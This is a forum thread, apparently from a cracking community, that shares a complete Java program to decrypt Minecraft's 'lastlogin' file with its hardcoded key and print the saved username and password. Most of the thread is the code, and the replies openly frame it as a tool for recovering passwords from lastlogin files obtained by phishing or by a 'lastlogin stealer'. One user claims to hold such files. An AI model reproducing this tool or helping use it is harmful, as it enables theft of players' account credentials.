Minecraft Lastlogin Decrypter

Posts 1–12 of 12 · Page 1 of 1
Minecraft Lastlogin Decrypter
Thought you may like this cracking freaks

Code:
import java.io.*;
import javax.crypto.*;
import java.util.*;
import javax.crypto.spec.*;

public class test
{


public static void main(String[] args)
{
new test();
}
public String user = "";
public String pass = "";

public test()
{
readUsername();
System.out.println(user+" "+pass);
}


  private void readUsername() {
    try {
      //File lastLogin = new File(Util.getWorkingDirectory(), "lastlogin");
File lastLogin = new File("./lastlogin");
      Cipher cipher = getCipher(2, "passwordfile");
      DataInputStream dis;
      if (cipher != null)
        dis = new DataInputStream(new CipherInputStream(new FileInputStream(lastLogin), cipher));
      else {
        dis = new DataInputStream(new FileInputStream(lastLogin));
      }
      user = dis.readUTF();
      pass = dis.readUTF();
      dis.close();
    } catch (Exception e) {
      e.printStackTrace();
    }
  }
 private Cipher getCipher(int mode, String password) throws Exception {
    Random random = new Random(43287234L);
    byte[] salt = new byte[8];
    random.nextBytes(salt);
    PBEParameterSpec pbeParamSpec = new PBEParameterSpec(salt, 5);

    SecretKey pbeKey = SecretKeyFactory.getInstance("PBEWithMD5AndDES").generateSecret(new PBEKeySpec(password.toCharArray()));
    Cipher cipher = Cipher.getInstance("PBEWithMD5AndDES");
    cipher.init(mode, pbeKey, pbeParamSpec);
    return cipher;
  }

}
Will soon Release an edited version of this in java this is very basic
and the point of this is? i dont see any need for this :P

but good job i guess
First you need too make a lastlogin stealer then youll need it bros
I am a noob.
How do I compile this using Notepad++??
Save it as a .exe file I believe.
Quote Originally Posted by FrogIsHam View Post
Save it as a .exe file I believe.
I am guessing you know nothing about java. You need to compile this with the JDK (Java development kit). You can get it from here
give credits ..
wait what is this? Could u give me details
this code allows you to decrypt your lastlogin files if you forgot your password
or when you phishing and get a lastlogin file you use this code to find the password

the credits go to minecraftforums
u cant compile with notepad++......................
Yes! I have some last login files! Give me now please!!!!
Posts 1–12 of 12 · Page 1 of 1

Post a Reply

Similar Threads

Tags for this Thread

None

Talk with us